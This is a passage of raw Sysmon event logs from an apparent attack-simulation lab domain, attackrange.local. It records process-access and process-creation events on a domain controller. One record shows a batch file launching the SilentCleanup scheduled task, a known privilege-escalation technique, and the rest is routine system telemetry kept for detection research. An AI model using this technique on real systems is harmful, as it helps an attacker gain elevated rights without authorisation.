07:56:58.219{466BC892-0664-60E8-6503-00000000CF01}40242340C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.202{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.202{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.202{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.186{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 
23542300x80000000000000001050625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.186{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6d9b5d.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.149{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.149{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5C9B556BB20748E4DF6056F9FC4D9C,SHA256=BF780A6CD0E2C298B4CAA6E9DDF42E75A262CE8D725F3646D1B7E0B213315C01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.133{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.133{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.137{466BC892-F5CA-60EB-697D-00000000CF01}8544C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 
23542300x8000000000000000808417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:59.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B8E8AD38D588A14ED6914F243C449C6,SHA256=23DB2C08DD828544E4B499680064A2E4602184E913D4A2CE4DCC974B88009A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C00B0A0A5F648A83FC7DABBE983256F9,SHA256=C7CA15308C8B34075C3A561F0429309B47C30AC271170AAACE47819BACEDA919,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51093-false10.0.1.12-8000- 354300x80000000000000001050801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.616{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 